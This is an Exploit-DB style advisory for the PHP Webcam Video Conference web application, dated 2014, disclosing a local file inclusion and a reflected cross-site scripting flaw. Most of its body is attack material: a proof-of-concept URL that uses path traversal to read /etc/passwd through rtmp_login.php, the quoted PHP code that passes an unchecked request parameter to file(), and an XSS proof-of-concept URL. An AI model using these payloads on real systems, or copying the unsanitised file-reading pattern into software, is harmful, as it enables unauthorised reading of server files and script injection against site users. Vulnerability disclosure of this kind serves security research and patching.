PHP Webcam Video Conference - Multiple Vulnerabilities

Author: vinicius777
type: webapps
platform: php
port: 80.0
date_added: 2014-02-06 
date_updated: 2014-02-06 
verified: 1 
codes: OSVDB-103017;OSVDB-103016 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt31500/screen-shot-2014-02-06-at-55339-pm.png 
application_url: http://www.exploit-db.comvc_php.zip

# Exploit: PHP Webcam Video Conference - LFI/XSS
# Date: 06/02/2014
# Exploit Author: vinicius777
# Contact: vinicius777 [AT] gmail / @vinicius777_
# Vendor Homepage: http://www.videowhisper.com/
# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference
# Solution: Upgrade from to the new version on videowhisper vendor homepage.




[1] Local File Include - rtmp_login.php

P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd

[+] rtmp_rlogin.php

$session = $_GET['s'];

$filename1 = "uploads/_sessions/$session";
if (file_exists($filename1))
{
echo implode('', file($filename1));
}
else
{
echo "VideoWhisper=1&login=0";
}
?>


[2] XSS Reflected

P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS]